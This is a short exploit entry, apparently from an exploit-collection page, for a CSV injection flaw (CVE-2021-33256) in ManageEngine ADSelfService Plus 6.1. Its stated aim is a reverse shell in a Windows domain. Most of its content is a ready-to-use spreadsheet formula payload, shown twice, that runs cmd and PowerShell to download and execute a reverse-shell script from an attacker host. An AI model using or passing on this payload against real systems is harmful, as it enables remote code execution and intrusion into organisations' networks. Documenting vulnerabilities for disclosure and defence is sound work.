ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
Obtain reverse shell in the domain environment exploiting CSV injection vulnerability
# Description
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0# Proof Of Concept
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'# Reference
PreviousThecus N4800Eco Nas Server Control Panel Comand InjectionNextOpenlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
Last updated